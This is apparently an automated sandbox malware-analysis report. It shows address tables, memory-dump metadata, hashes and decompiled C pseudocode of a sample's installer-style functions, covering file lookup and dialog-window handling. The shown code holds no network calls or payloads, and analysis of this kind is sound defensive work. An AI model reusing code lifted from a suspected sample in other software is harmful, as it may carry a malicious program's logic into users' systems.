                                                    0x00406d95
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e23
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed3
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x0040710a
                                                    0x0040710a
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406eac
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00000000
                                                    0x00406e1a
                                                    0x00406ea6
                                                    0x00406daf
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x00000000
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407137
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x00000000
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x00000000
                                                    0x004073c8
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00000000
                                                    0x0040753b
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x00000000
                                                    0x00407390
                                                    0x0040738e
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                    0x004069a9
                                                    0x004069b2
                                                    0x00000000
                                                    0x004069bf
                                                    0x004069b5
                                                    0x00000000

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(766DFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004069A9
                                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                    C-Code - Quality: 84%
                                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
